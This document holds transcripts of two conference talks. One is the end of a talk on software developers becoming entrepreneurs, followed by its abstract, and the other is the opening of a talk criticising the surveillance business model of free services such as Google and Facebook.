And you have to be willing, you have to know how to message people to tell them, that's what we do. All right? In addition, you have to learn how to take your product and make it better. One of the goals that we've always had at D&Simple that I've always had is how can I do the simplest thing possible in a world that's driven by complexity, which in the case of domain registrations tends to be there's all these rules of things that you have to do in ways that it's always been done. And so the goal was how can I keep that as simple as possible? And that's all about developing a product and understanding the product lifecycle and understanding how to make the product just good enough so that we could launch it, but at the same time, knowing that we weren't going to overdo it and spend all of our time just trying to add these features, these useless features. And I'm not to say that we didn't add some useless features along the way, but we've also removed features along the way. So you have to understand how to develop the product. You have to understand how to help people. You have to know how to diffuse the bombs of customer service because there's nothing quite as scathing as somebody who is not happy with your product and they have a Twitter account. All right? These two things combine together. It's just, it's got a really short fuse on it. So you have to understand how to empathize with your customers, how to realize, put yourself in their shoes and imagine if they just click through seven pages and they still haven't accomplished what they've done. Like the easiest way up course is to dog food your own product to use it and we are able to do that. You can't always do that, but usually that's the best way to do it. Strategy, having a vision and something that not only you can believe in because you have to motivate yourself day after day when things aren't great in the very beginning and you have one person buying something and then a couple of days where nobody buys something and another person. You have to have a vision and a dream, something that you can look forward to and say, this is what I'm aiming for and this is why I'm going to suffer through these hard times and there's going to be more hard times along the way. So you have to create that and then that same vision has to eventually be given out to your employees and the people that work with you, your partner is your employees, whatever how it is, they have to share that vision and it won't always work. Sometimes you'll think you've gotten the vision across only to realize that someone else on your team has a completely different idea about what the business is all about. So that's another thing you have to do. You have to entice people to come work with you, how to share that vision and then how to keep them happy. That's an important part and a very, very hard part of what you have to do. In fact, maybe the hardest part of building a company is the day when you hire your first employee and you realize that they don't have any financial vested interest in your company's success. So what is it that motivates them to be there every day? And so you'll start thinking about these types of things and it's an important part of what you have to go through. You have to learn to adapt with your team. As your team grows, there's going to have new opinions and that's good. You want those opinions in there but you have to be willing to adapt. 
So a successful leader in a business is one who's going to adapt to the team around them and build up a great team over time. It also means that you have to be willing to fire people sometimes. This is really hard. If you've never managed a team, the first time that you have to tell somebody that they're fired is probably going to be one of the hardest days you're going to have in a year, all right? Because sometimes you have to fire somebody because they're underperforming. But they're going to take it bad pretty much no matter what, because they may be thinking that they're performing very well, even if you've warned them multiple times. And that's a very, very hard thing to deal with. You may also just have people that leave, and especially if it's in the early days of building a company and somebody just decides they don't want to be part of your company anymore, you have to shoulder that burden and you have to talk to your team about it as well. So these are all aspects of working with people. You have to be willing to understand how your systems work and this is the systems of software, of hardware, of whatever it is that you are actually running out there and building. I'm focused largely on companies that make software or services because that's what's interesting to me. But even if you, or maybe even more so, if you're building a physical product, you have to deal with all of the operations of getting that physical product from design to delivery, right? And these are all things that you have to deal with, the operations of the company and of the systems are really, really hard as well. So these are all skills that you'll need. And of course, you can finally touch on your software development skills since I know that everybody, well, most people here at the conference are probably pretty good developers. So, but it's, I'll tell you this is actually a really good thing. This is something I want to get back to here now. So I minimize the need for focusing on software development. The reason is because you're good at it already, all right? What you have to get is get good at all those other things. But software, the skills that you've learned as a software developer or as an engineer or as a product manager, that's your secret weapon. There are multiple secret weapons, I think. So I'm going to go through them really quick. And these are the strengths that I think that anybody who develops software over a significant period of time will learn as they learn their craft, all right? The first one is you have an ability to construct systems, all right? So this is, you can look at a problem and not just look at one piece of the solution. You can look at the system as a whole with data coming in and data flowing out and multiple components along the way and maybe variations in paths where you have branching. And many people don't think in this way until they're, until they are trained to do it or if they're really passionate about it and learn. But every time that you're inside of a piece of software and you write a little if-else branch, you're making a change in the system. This is complexity in the system. And software developers who over time learn to control this complexity in the system have a sense for building these systems. And in fact, all businesses are systems that work well together to ensure that more money comes in than goes out. More money coming in than going out to pay for stuff. That's essentially what it is.
So being able to put together systems like this is one of your superpowers, if you will. All right? The second one: you're creators. You have a skill. You have an ability to control the machines to tell them what to do. And with this, you have the power to automate things very early on. All right? A lot of entrepreneurs who are not software developers would do a lot by hand for a long time or they'd hire people to do it and they'd start bringing on people, whether it's contractors and you're going to have to do this as well. Or they might hire virtual assistants or they might hire actual employees that are low level and have them doing tasks that are manual. But you have a power, a superpower, where you can have the machines do that work for you. And that's something that's a very, very, very important part of being able to build a successful business in a bootstrap fashion. The third thing that you have, most of you probably have, is an analytic mind. So you have the ability to look at a problem and analyze it and think about the various outcomes and what you want. You have a goal. You say, okay, I'm going to look and I know the path to get from here to there, so from A to B. All right? So you have this mind. That's powerful as well, because it ties back into the ability to build those systems. So not only do you know how to create those systems and operate those systems, but you have the ability to actually think through them in advance. And then finally, you may not think that you have this, but more and more developers are being called on to be responsible for the systems they put into production. You've probably heard of the whole DevOps movement. There are several talks here about it. What that really is about is every software developer taking responsibility for every bit of code that they put into production. From the day it goes in to the day it dies and is turned off. All right? That's a big responsibility. That means being responsible and not writing buggy code. It means being there when you have outside factors that come crashing in and fight to take down your systems. Right? So this responsibility is something that is extremely valuable in terms of building a business because when you're at the helm of a business, you're responsible for all those things I talked about earlier. All right? And as long as you're willing to take that responsibility, you have a power to actually build that into a successful business. The worst thing you can do is say, eh, that's not my problem. Well, if it's your business, it damn sure is your problem because it'll stop the money coming in and it'll have more money going out. So those are the four things that I think, and there are probably more, but these are ones that I feel are important, that software developers have these special abilities, these powers that not everybody has. All right? So use those special abilities, take them and apply them in your business. There is a problem, there are a few issues that you have as well. I'm going to go over two of them right now and I suffer from this as well and it's something I focus hard on trying to be better at. The first one is because we spend our time with the machines, many of us have a limited amount of empathy for the people around us. All right? We forget to take into account what you're thinking and what you're feeling when you're using the product: how am I feeling when I'm using the product?
How does the product make me feel? Does it make me happy? That's awesome. That means you have more customers. Does it make me angry? That means you're probably going to have customers that are going to be there for a little while and then they're going to go away and they're going to talk bad about you. Does it just make you sad? All right? Then they just might give up altogether and go, okay, I'm going to be a beet farmer somewhere in the Midwest. So we have a problem with empathy and that's one of the things that I think is starting to come around, that maybe software developers, we as a group, are starting to understand we need to be better at. I definitely know I am. I'm working on this every day to try to identify and understand the feelings of others around me because I can be a very, very harsh person. So the other one that I think that we sometimes have trouble with is the ability to just let go and delegate a task or a subsystem to somebody else. We want to be in control. That desire to be in control is a very powerful desire. You want to tap into that in the beginning when you're creating the company because it's going to be the driving factor. When you're in one of those times, you're like, why the hell am I doing this? I could just go work for somebody else. When you come back to it, you're going to remember, oh yes, it's because I want to own this thing. I want to be the responsible person for this. You just have to know there comes a point where you can't do all of it. You're going to have to hand off. It doesn't have to be a fast thing. You can grow organically and delegate over time, but you do have to be willing to let go. Before you let go, you have to put things in place to guarantee the success of the people that you're letting go to because they're your team. They're going to be the ones that you depend on to do a great job. This comes back to setting up systems, to preparing for the inevitable time when you have to hand something off, be it software development, be it marketing, be it sales, whatever it is. I have a problem with that. I'm just going to... A lot of people that I know that write software have a problem with that. We like the control factor, and there's a point where we have to give it up. So, keys to success in all of this. The first is, and I talked about this in the beginning with lots of those slides, that I failed a lot, and I'm okay with that. Failure is the time where we learn how to do better. And if you're not failing, it's because you're not trying hard enough, is what it comes down to. You're not pushing yourself beyond your limits. If you're always a success in your mind, then what are you not doing to actually push yourself beyond those limits? Right? So, I've come to embrace failure. I'd prefer that once I've failed once, I don't repeat that. And I think the mark of someone who's successful is they fail once, maybe twice, but they learn from it and they don't make that mistake again. The second thing is you have to know when to move on. One of the hardest things to do is when you have those golden handcuffs of that great job or that consultancy that you're building stuff for other people and it keeps the money rolling in, and it's like, but you're not thrilled about doing it, but, wow, look at the cash rolling in. And that's one of those things where you have to know, all right, if I really want to do this thing, I have to know when it's time to move on.
And I'm not suggesting you just jump ship with no plan on the contrary. Do it methodically. Do it just like you were building software. You know, test your theories, say, this is my goal, and then start building out these systems that let you reach that goal. You have to take calculated risks, not just risks, not just any old type of risk. You have to calculate the possibilities that are around these risks. And you have to ask yourself, is it worth this risk? Is the potential outcome, the problems that could occur from it, the damage that it can cause, is it less than the benefits that I can gain from taking this risk? So any entrepreneur has to be willing to take those risks. And there's cultures, I live in France now, and in France for a long time, risk was, especially starting your own business, was looked down upon. It's a culture that does not believe that you can fail, and so therefore people take less risks. Fortunately, in the United States, the opposite is true. People take stupid risks all the time. I mean, just throwing money away, throwing, just doing crazy stuff. So there's a balance in between there. And the balance is about knowing those risks you're going to take, calculating what the potential outcomes are, and then going for it when you say, this is a, this generally will probably be a good thing. Trust but verify. If you've heard this, this is important as you start to hand off to your team. You have to be able to trust your team, but they, somebody's going to screw you. That's what it comes down to. Somebody is going to eventually do something, whether it's on purpose or not, that will cause you a lot of trouble. So you need to learn to verify as well. Trust that they're going to do a good job, but verify that they did a good job through the process, through whatever processes you build. And then finally, understand what people need. This comes back to the empathy. When I say people, I mean your customers. Get out there. And if you think that you're going to solve a problem, get out there and talk to them and say, am I solving your problem? And if not, listen to what they're telling you. Why are you not solving their problem? But it's not just your customers. You also need to listen to your team. All right. Make sure that they're happy. Your business partners, your partners in life, your husbands, your wives, your girlfriends, your boyfriends, your significant others. It doesn't matter. You need to listen because this is a stressful thing. Building a company is very hard and you need to listen to what the people around you need as well. Because if you can deliver what they need, then you'll be very happy. And that's the final person that counts in here. You have to listen to yourself. You have to say to yourself, what am I really looking for when I'm doing this? Right? What are my needs in all of this? Because it's also very easy to get so deep into solving everybody else's problems that you let yourself go. All right. Did you start? You stop exercising. You eat unhealthy. You know, these are all the symptoms, essentially, of focusing so much on everything else that's going around that you forget about your own needs as well. So to finish up here, I have a couple more things and then I'll let you guys go queue up and we can go talk about this outside. Why build a business in the first place? If you have a great job that you really love, why? Why even take the time and the risk to go out there and build a business? And the answer is very simple. 
That if you want the freedom to do what you want to do, which may be charitable projects, it may be spend more time with your family, it may be go travel around the world, whatever it may be, that only you, you're the only person that can control your life and get those things that you want. All right. And by having, and I'm not knocking, I was employed for a long time and I worked for many, many great companies, but there comes a time when you have to look and say, I'm investing my time and they're getting the benefits out of it. Yes, I'm getting a paycheck, but in the long run, what do I really get? And building a business of any type is about building something that is going to return over the long run. There will become a point in time where you can hand off as much of this as possible and you realize you've created a business that sustains you without having to spend all your time doing it. And that's the goal. That's the goal of building these systems. It's the goal of finding great teams. It's the goal of making sure there's more cash coming in than going out. All of this is designed to let you control your life. If you don't ever want to run a business, fine. It's not for everybody. But all those skills that I talked about, finance and accounting, marketing and sales, product management, don't just turn your back on them. Because if you can own those things as well in the terms of whether it's inside your business or your personal life or whatever it is, you are extremely valuable because most people will not look at that. They're not going to look at the big picture. They're not going to think, how does my company that I've been working for actually operate? Where are their customers and why do they come and give us money and why do they leave? And the minute that you know that is the minute that you actually have power over your destiny even inside of a company. So don't just turn your back on these things and just spend all day programming. Programming is a lot of fun. Building systems is a lot of fun. But you know what? Having the knowledge to actually build systems that go beyond computers and involve people as well, that's really powerful. Ultimately though, you have to craft your life. All the pictures that I've been showing along the way are pictures from places where I've had the fortunate ability to live there. I've had the pleasure of living out in Hawaii. I've lived in Florida. I've lived in Paris. Now I live in the south of France and that was only possible because I was willing to take a chance and look at the paths that were out there, take calculated risks and essentially craft a life that I want it. All right? So I hope that this gives you a taste. If you're sitting there on the fence and wondering, should I be, should I take the jump and actually start building my own business? If I do it, you know, is this going to suck? Is it going to be great? I hope this gives you the incentive to give it a shot if you're on the fence. And if you're not on the fence, just think of the things I've talked about. What can you do? What's the one thing that you can take from that list, that one skill that you don't know right now that you're not very comfortable with? Sales maybe? And get better at it. Just go try to sell something. Just go try to pitch and write some copy and get somebody to actually go, man, that's pretty good. 
Like, just do that one thing and all of a sudden you'll realize, man, that opens up a whole bunch of doors and lets me craft the life that I want to craft. And with that, I am done. These are the pictures that I took, all of Flickr. My name is Anthony Eden. And if you have any questions, we can take it out there or right here, whatever. Thanks very much.
|
You're a software developer today, but tomorrow there's a good chance you'll be running a business, even if you don't know it yet. As a software developer you have a set of skills which prepare you for building businesses. Creativity, problem solving, analytic skills - all of these things can help you step into the role of entrepreneur. In this talk I'll tell you my story of how I went from writing code to running a business and give you some ideas for what you'll need to learn along the way. From a basic understanding of financing and accounting to a sense of empathy necessary to connect to those around you and lead a business to success, there are skills that you can improve on that will help you even if you don't become the boss.
|
10.5446/50787 (DOI)
|
Hi. Hello. People are still taking their seats. Hello. I just want to thank the folks at NDC for that lovely introduction. That's not something I get every day. Yeah. So, thank you also to the 40 or so of you who have unplugged yourselves from the matrix in the video room to come here in person and see the talk. I appreciate your effort. All right. So, let's get this started. How many of you know what this is? Anyone? Someone does. You might have seen my talk before. Yes, he's smiling. This graph specifically, where is it? It's up there. This graph specifically, this point on the graph, is where Facebook knows that you have started your next relationship. Whether or not you have actually explicitly told Facebook that you started your next relationship. So, how do they know? They know because of these little black dots. Now, these little black dots are the number of timeline posts between you and another Facebook user. And the x-axis, the horizontal axis is days. So, that's the number of days leading up to, that's 100 days, leading up to when you started being in a new relationship. So, this is fascinating for me. The question that pops into my mind is when in those 100 days does Facebook know that you're about to start a new relationship? Is it quite possibly before you yourself know? And perhaps more importantly, who owns this information? Because this is very valuable information, right? Who owns this data, this intelligence about us? So, this was released in a blog post by Facebook and someone asked, is this anonymized data available? And Facebook's response was, sorry, we don't even release anonymized data. So, who owns this data? It's very clear, right? In this case, Facebook owns the data. So, if you've been following Facebook recently, they just bought WhatsApp, the messaging application. Well, I say just, it's been a couple of months. For $19 billion. Now, why did Facebook pay $19 billion for WhatsApp? What was worth $19 billion? Well, what they bought were the phone numbers of 450 million people, now over 500 million. But more importantly than that, they bought the right to listen in on all of their future conversations. So, that's what's worth $19 billion to Facebook. So, imagine how much your data is worth. So, you might say, Aral, so what? It's fine. I mean, if Facebook's terrible like that, I'll just stop using it. And, you know, if anyone else is terrible, I'll just stop using it. I don't think that this is a valid answer. I beg to differ. I don't think we can just stop using these services anymore. And here's why. Our relationship to computers has altered fundamentally in the last 30 to 40 years. Computers used to be these external cold devices that took up entire rooms and you had to drive to one if you wanted to use it. Today, we wear them on our persons. You don't get more personal than that. You wake up with your mobile phone. You go to bed with your mobile phone. That's a very personal relationship. There was a time when computers were disconnected from the world around them and from each other. Today, via a plethora of sensors, they are always connected. They're always seeing. They're always hearing. So, today, it's not much of a stretch to say that we have become cyborgs. Not that we implant ourselves with technology. We don't have to implant it. But we extend our biological capabilities using technology. We extend what we can do using technology. We experience the world and we manipulate the world around ourselves using these tools and technologies. 
And if they work well, they empower us. They give us superpowers. They let us do things we cannot otherwise do. If they work badly, they infeble us. They disable us. They stop us from doing things that we can otherwise do. But what's essential here to understand is that these technologies are no longer optional. These technologies have become an essential part of our lives, of living in the modern world. So, I will disconnect is not a viable solution. We cannot disconnect. So, the question really becomes then, who owns these essential tools? And today, it is a handful of companies. Apple, Facebook, Google, Twitter. What's common among these companies? That they are all closed. And for a subset of these companies, specifically Google, Facebook, Twitter, they are also free services. So, some of you might be saying, so what? That's great, right? Free is great. Who doesn't like free? Free is awesome, right? Who likes free here? Free is good. You like getting free stuff, right? Nobody is putting their hands up. They are like, they know something is coming. Well, for those of you that do like free, right? I want to tell you about a beautiful startup. I am so excited about this startup. I think you are going to be as well. Startups are cool, right? They make lots of money. We love them. We love money, right? Money is great. That's a Silicon Valley way, right? It's called snail mail, all right? And with snail mail, we have solved a very important problem. We have solved the problem of real mail. Yes, yes. We have solved the problem of real mail. With snail mail, you will get free real mail forever. You can send as many letters as you want, as many packages as you want, to as many people as you want anywhere in the world for free, forever. Who thinks this is a great idea? Who would use snail mail? Yeah, yeah, yeah, there are several of you. Now, there is a catch. We do open your envelopes and we do read your letters. But it's only so that we can understand you better, so that we can attempt to give you valuable services and offers from what we've understood, which might be correct. It might not be correct. We're trying, right? And then we'll just put all of that back in the envelope and you will never even know that we were there. Who's still excited? Who would still use it? There's always one. Yeah. In Oslo, there's two apparently. The rest of you, you use Gmail, right? Yeah, nobody uses Gmail here. Who uses Gmail? Right. So there might not be a person opening every one of your emails and reading them, but there is an algorithm. There is a computer doing that. So that's snail mail. Please tell your friends it's at snailmail.com. They can find out more about it. I'm very excited. I think snail mail is going to be huge. So why does Google do this? Why does Google do this? Are they evil? Are they henchmen in a basement somewhere laughing like maniacs? Yes, says someone. I don't think so. And there are lots of good people who work at Google, perhaps misguided. They do it because it's their business model. That's how they make money. You don't need vast conspiracy theories when you have the simplicity of business models. It's simply how they make money. So just like the mutant plant from outer space in the musical Little Shop of Horrors, Audrey II, who starts off as a little sapling that needs drops of blood to grow and then ends up eating whole human beings, Google needs your data to grow. It's just how they exist. And how do they get your data? So they get your data via a plethora of methods. 
One of them is services. Google started out as a sapling. It started out as search. When they first started out, they weren't even tracking you. They stumbled onto that business model later. But today, Google is not that sapling anymore. It has grown into the big mother plant. It has a plethora of services. So do you want to put all of your files somewhere? Well, please, just put them on Google Drive. Will we look through all of your files to understand you better? Of course we will. That's how we make money, by understanding you better. Your photos, please, put them up on Picasa. Will we run facial recognition to see who you are, who your friends are to understand you better? Yes, that's how we make our money. Do you want to talk to your friends? Use Google Chat. Use Google Hangouts. Again, we'll be listening. But just so we can get to know you better, that's how we stay in business, right? And there are also games as well. But before I even go to that, think about it. You know, I mentioned talking to your friends, right? I said Google Chat, right? Hangouts. And we mentioned Gmail, right? Think about Gmail. You might say, Aral, hey, you know, it's fine, but it's my decision. I know what Google are doing. And I'm fine with it, man, because I get this really valuable service back, right? Anyone ever thought this? Yeah, I have nothing to hide, right? I get this valuable service back. But is it really just a selfish decision that you're making? What about everyone who emails you? Google also gets to read their email. And they may not have made that decision, especially if you're using a custom domain. They may not even know that you're using Google, and Google still gets to read their email also. So this isn't just a selfish decision you're making for yourself. You're also deciding for everyone who communicates with you that it's okay that Google can see what they're saying as well. And so I think we have to ask ourselves whether we have the right to make that decision for other people also. So I was saying, and there are games, right? Who's used reCAPTCHA? reCAPTCHA, anyone? Some of you. It's a great game. They're very transparent about this one, right? It might look like what you're seeing on the screen right now, where you have two words. One word is a word that they know. And they're trying to test whether you're a human. The other word is a word that they've scanned in from a book that they can't read. So they're getting you to help them to read the books that they've scanned in. And sometimes you will see this with the picture of a number on top of a door. That's Google Street View. They've taken a photograph of a door. They can't read the number on it. So they're trying to get you to show them what the number of that door is. And sometimes there are real games. Ingress. Anyone played Ingress here? It's a game that you play on your Android phones. It's free, right? And in Ingress, you walk around the real world and you're playing in teams and you try to find landmarks. And you try to hack into these landmarks in the game world, right? Because there's like an alien invasion. It's really cool. But what they're really doing is they're getting you to walk around town and to provide them with very hard to come by data on pedestrian walking patterns. That's hard to come by data. So what they're doing is they're sending you into the city so that you can get that data for them. And they're just watching you with the app, right?
So they give you a game and you play the game and everybody's happy, right? So you might say, Aral, I don't like this. You know? Okay. You've convinced me. I'm going to stop using their services. Damn it. They've lost, right? Google can't lose. They need your data. So if services are easy enough to ignore, let's say, right, what's the next step? Well, what if we give you devices? What if we give you beautiful devices? Anyone have a Nexus phone here, like one of the later ones? Gorgeous experience, right? Google has started to understand user experience now. They didn't always. They do now, right? It's a beautiful experience, a Nexus phone. And guess what, guys? You know, I might as well be working for Google right now because it's also half the price of an iPhone. Wow. Why is a Nexus phone half the price of an iPhone? How can that be? Does Google have twice the economies of scale of Apple? I mean, Tim Cook is meant to be a supply chain guy. Is he asleep at the wheel? Are they incompetent? No. It's half the price of an iPhone because it is subsidized. Because what this is is a glorious, beautiful, gorgeous data entry device that you buy to be able to give your data to Google. So they subsidize that because it is valuable for them, right? And what they do with this is they make your sign-in to your device, your login to your device, your Google username and password. Because with a service, you can say I'm just not going to use it. But with a device, if they make your sign-in to the device, your username and password, your Google account, then it doesn't matter what service you use, they will still get some data at least, right? That's what they need. That's what keeps them alive, a little bit better than nothing, right? Same with their tablets. Same with their Chromebooks, which they're now trying to push into schools, right? Google Chromebooks in schools. What could go wrong? Just recently, they actually had to say, okay, we're not going to read the email of students. You know, they actually had to say that, right? Because they were previously. So you might say, okay, wow, okay, this is screwed up. I'm going to stop using Google devices. They've lost. They can't lose. What's the next step? What's the next step? If you grow with data, what's your end game? If you need data to grow, what's your end game? Your end game is providing connectivity. Why? Because if you can make people's sign-in to the internet, their login to the internet, their Google username and password, like they're trying to do with Google Fiber, for example, in the US, right? Sign in to the internet with your one Google account, then it doesn't matter what device you use. They will still get some valuable data, right? It doesn't matter if you use an iPhone, you're connecting to the internet with your Google account. They'll still get some valuable data from you. And the same with projects for the next five billion. Have you guys heard of the next five billion? Everyone's talking about them. In case you don't know, they're these poor souls in places where they can't reach the internet. And their biggest, biggest problem, I'm sure, is that they can't reach the internet. And we need to somehow reach these five billion people because, gosh darn it, we are such lovely white people who live in the West who want to give them internet access, right? Like the colonialists bringing fire to the natives. We need to educate them and connect them to the internet, right? That's why Google has Google Loon. Yes, balloons. 
Actually, just now they announced that they're going to spend over one billion in purchasing satellites so that they can beam internet into these countries, right? What kind of internet? An internet that you sign into with your Google username and password. So it's not inconceivable that in the near future there might be a whole nation whose only notion of the internet is something that you sign into with a Google username and password. And if that's not worrisome, I don't know what is. And it's not just Google. Facebook, internet.org, have you heard about it? They want to connect everyone to the internet with your Facebook username and password. Why? Because they want your data. It's very, very simple. So they need data about you. That's part of it. They also need data about the world. They just really need data, right? So how do they get data about the world? Let's just concentrate on Google because, of course, we could do the same thing for some other companies. But Google is quite unique. So they have Google Earth satellite images. They have Google Maps. They have Google Street View, right? Isn't it great? Have you guys seen the Street View car? It drives around and it, like, gets close-ups of the streets and the buildings. It's really cool. But there are some places that the Street View car can't go. But we need that data. So there is the Street View trike. If the car can't go there, we will go there with a trike, right? But there are some places you can't go with a trike. What if you're on a snowy mountain? Well, don't worry. Because there is the Street View snowmobile. And there are some places that a snowmobile can't go. What about indoors? Right? There is the Street View trolley. They will go around with their trolley. Why? They need that data. They really need that data, right? But what if they can't get there with a trolley? Don't worry. There is the Street View trekker, the backpack, right? Now, even though they have all this, there are still a few places that they cannot go because you probably will not let them in, right? Even if they come with their backpack with this strange thing protruding from it, or maybe because of that fact, you probably will not let them into your office, your workspace, and you probably will not let them into your home. And that is why they need you, right? Have you heard of Project Tango? Project Tango is their latest project. It's really exciting. It's this new mobile phone. And what this mobile phone has is it has built-in depth sensing and has a built-in motion tracker so that when you buy this phone and you walk around your home, it starts mapping out the inside of your home in three dimensions. It starts understanding what objects are in your home and recognizing the objects that are in your home. So isn't this really cool? I mean, you can create a whole 3D representation of your home that, of course, Google has then, right? Because you probably wouldn't have let the Street View people in if they knocked on your door and said, Google Street View, can we come in? I say probably because I've seen a parody on the Internet where a group went to people actually with a hidden camera and said, Google Street View, can we come and map your house? And they let them in. But again, if you don't let them in, well, they can use you. They can send you, after you've bought their phone, into the spaces that they cannot get into to get the data that's there, right? This is all you need to know to understand things like Internet of Things, right? 
Internet of Things is really important. What is the Internet of Things today? The Internet of Things is the Internet of Things that spy on you. They happen to be things that are on your person or in your home. They feed out to these data sources. They might be independent ones that get bought by Google or Facebook or whatever afterwards once they have enough data, or they might be ones that lead directly to them, like the Nest. So just like Audrey 2 in the musical Little Shop of Horrors needs blood to grow, free services need your data to grow. It is just their business model to monetize your data. Their business model, in other words, is to spy on you, to make money by spying on you. That's how they stay in business, right? So the business model of free is the business model of corporate surveillance. We all know about government surveillance, right? We all know government surveillance is bad. Who keeps telling us that government surveillance is bad? Facebook and Google tell us, right? They're like, look, the government! Oh my God, what are they doing? They're terrible! The NSA! No, we hate them! They should not have your data. In the art of magic, we call that misdirection. Don't look at me. Look at that, right? What is our business model? Oh, we need your data. Yeah, we spy on you too. Uh-huh. So in this model, in this business model, who are you? You might have heard the saying, if you're not paying for it, you are not the customer, you are the product being sold, right? I prefer: you are the quarry being mined. You are the livestock being farmed, all of us, right? Because your data is just raw materials, just like what you mine out of a quarry. That's not the most valuable thing. What you extract from that is the most valuable thing. Our data is just raw materials. What's really valuable is our profiles. When we combine those pieces of data together, that creates a profile of you. That creates a virtual you, a digital you. I like to call it a simulation of you. So is Google in the search business? No. They are in the business of simulating you and simulating the world. They're in the simulation business. Why? Why is this valuable? Because I can't take you right now, your body, right? I can't take you, put you in a room, lock you up, and then psychoanalyze you 24 hours a day. I can't poke you and prod you. I can't do that to find out what your desires are, what your fears are, you know, how you tick, to figure you out. Because there are laws against that. Our corporeal selves are protected by laws, right? We've had that for a while. But what if I can create a simulation of you? And what if that simulation is high enough resolution? Because I have so many data points about you. That it is essentially you, right? If I can simulate you to that degree so that it is essentially you, without your body but everything else that makes you you, I can take that and I can put that in a lab and I can do whatever I want to it. Why? Because there are no laws governing that whatsoever right now. This is one of the things that we need to change. This is one of the areas where we need regulation. So please do not disconnect from the political process, because even though we think those people are ineffective, we're going to have to support the ones that are trying to change the laws in this way. This might be the Pirate Party, it might be other parties that actually have an idea about what's going on, which isn't many. But we need to be politically involved as well.
This is not something we're going to solve with just technology alone, right? So why are they doing this? Because all of us, we're trying to create what I call the experience machine. This is the end game of design as I see it. I'm a designer, right? The experience machine is a theoretical device. It is a device that knows everything about the world, that knows everything about you, and can read your mind. Now if we could build this today, we could all go home because our work here is done, right? Let's listen to Eric Schmidt. He says, we know where you are, we know where you've been, we can more or less know what you're thinking. So that's the ex-CEO and current Executive Chairman of Google. He said this four years ago. That's an eon in internet time. So you might say, well, so what? You know what? Yes, maybe they spy on me, but you know, they also care about my privacy. You know, it's kind of like the mafia. We'll protect you. Just stay with us, right? They care about our privacy. If I set something to private there, it will be private, right? Not really. Not anymore. Not after 9-11. After 9-11, what happened in the States was they set up this organization, the Information Awareness Office, with the publicly stated goal of attaining total information awareness, to know everything about everything and everyone, right? This was their real logo. I kid you not, this is their actual logo, right? Now if you're going to set up an organization with the goal of knowing everything about everyone, don't make this your logo. People get scared, you know, with a huge pyramid with an all-seeing eye shooting lasers at the world. Don't do that. So people got scared and they said, oh, no, no, no. We're not really going to do that. We'll shut it down. We were just playing with you, right? But as the Edward Snowden revelations last year showed, the NSA really needs to hire a PowerPoint designer. They do. But apart from that, they were sharing our data and they are sharing our data. All of the companies that we trusted with our data were sharing it with the U.S. government. Now there's one more thing about this slide. I don't know if you've noticed, but it doesn't happen every day, so I do feel I have to point it out. Microsoft was first at something. That doesn't happen every day. I think it deserves to be acknowledged. So what were they sharing? Everything. Everything that we thought was set to private was being shared. Why? Because it's so much easier to go to a third party that you have voluntarily given your information to and ask them for it, because it's not under the same protections under the law. To get that information directly from you, they would have to get a search warrant. They would have to get a warrant from a judge at least. And what does that do? It makes it expensive. Could they do that to everyone? No. Can they do this to everyone? Yes. That's what we call dragnet surveillance. It's like fishing with a dragnet. You just want to get everyone's information and spy on everyone. That's what a lot of people have a problem with. It's like the security researcher and cryptographer Bruce Schneier said, the NSA didn't wake up and say, let's just spy on everyone. They looked up and they said, hey, the corporations are spying on everyone. Let's get in on the game. Let's get a piece of the action. Right? So if this is the case, I'm sure that the people who run companies like Google and Facebook really are worried and they care about our privacy, right?
And they're going to do something about this. So again, let's see what Eric Schmidt thinks about this whole thing. He says, there's been surveillance for years. I'm not going to pass judgment on that. It's the nature of our society. So Eric, what should we do? If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place. Maybe you shouldn't be doing it in the first place. If you have something you don't want everyone to know or anyone to know, maybe you shouldn't be doing it in the first place. Why didn't we think about this? Problem solved, right? Well, I have to say, I've met Eric and he's a very stand-up guy. He didn't just say this. He believes it. You know, in his heart, he believes this. So to prove that he believes this, he created a couple of websites. He went on the internet and he created a few websites and he put his own personal images and his own personal videos of him and other people on these websites just to prove the point that if you have something you don't want anyone to know, you shouldn't be doing it in the first place. Some of my favorite ones that he created: there is ericstoiletantics.com. It's very interesting videos and not my taste, but there's also ericsfavoritesexytimes.com. It's very interesting photos and images and videos of Eric there. But my favorite by far is ericsmasturbationadventures.com. He goes on some great adventures. It's just amazing. You should really see it. Now these websites don't exist. And I know there are developers in the room, nor should they exist. Because privacy is not about whether or not you have something to hide. Privacy is having control over what you want to keep to yourself and what you want to share with others. Privacy is a fundamental human right for a reason. It is a fundamental human right that we have enshrined in the Universal Declaration of Human Rights, in Article 12 to be precise. And the reason is because privacy is a prerequisite to civil liberties. It is a prerequisite to the rest of your human rights. It is the bedrock upon which we build our civil liberties and our fundamental freedoms. So with their business model of so-called free, companies like Google, companies like Facebook are emerging as real threats to our privacy and therefore to our civil liberties and therefore to our human rights and therefore to our democracy. So free is a lie. It's a lie because it is a concealed barter. There is a barter going on. We are just not told about the value that we are contributing and about the value of what we are possibly losing in that relationship. So in that sense, it is really more a con, a confidence trick, the textbook definition of a confidence trick, of getting someone to trust you and then actually getting them to believe something that isn't true. It's a con. What do they do? They say, it's free. Come join our new platform. Let us grow together. It's free and it's lovely. What are they not telling you? That when their venture capitalist backers want ten times their money back, they're going to screw you by monetizing your data. That's the bit that's concealed. So it's a con. If you listen to Michael Novak from Facebook, he's a product manager, he recently said, now we are thinking about privacy as a set of experiences that help people feel comfortable. That's how they're thinking about privacy. Comfortable with what? Comfortable with the fact that you don't have privacy. In other words, it's a con. And it's more than a con. It's a monopoly.
This business model is a monopoly on the internet today. So you might say, hey, I'm not going to use Google, I'll use Yahoo. What's their business model? Corporate surveillance, spying on you for money. I'm going to use LinkedIn. What's their business model? I'm going to use Snapchat. What's their business model? But they delete their photos and yeah, right, off of your device. So what happens when every alternative you have has the same business model? That's a scary place to be. And where every new startup thinks that this is where they want to be, right? The Silicon Valley dream is a nightmare. Take this. Who's seen spritz? How cool is spritz as a technology, right? For those of you that don't know, it is a way of reading. Now concentrate on that video and you're reading it something like 250 words per minute. It's a new way of reading. How often does that happen in the history of humanity, right? We've been reading like this for a very long time. This is awesome as a technology. And when I listened to their CEO present at a conference that I was at recently, he said, and you know what, it's great for people with dyslexia. Anyone have dyslexia over here? Anyone suffer from dyslexia? Yeah, anyone have it? No? No? Okay. If you do, it's great because apparently you can focus and that's part of the problem with dyslexia. You can focus and you can read better. So that's awesome, right? But what's their business model? They don't sell this. It's not an app that they sell. They have an SDK, a software development kit that they give to anyone to create tools, right? To put this technology in their own apps. The CEO was saying, I really want people to build great apps with this. You know, maybe email apps or other. 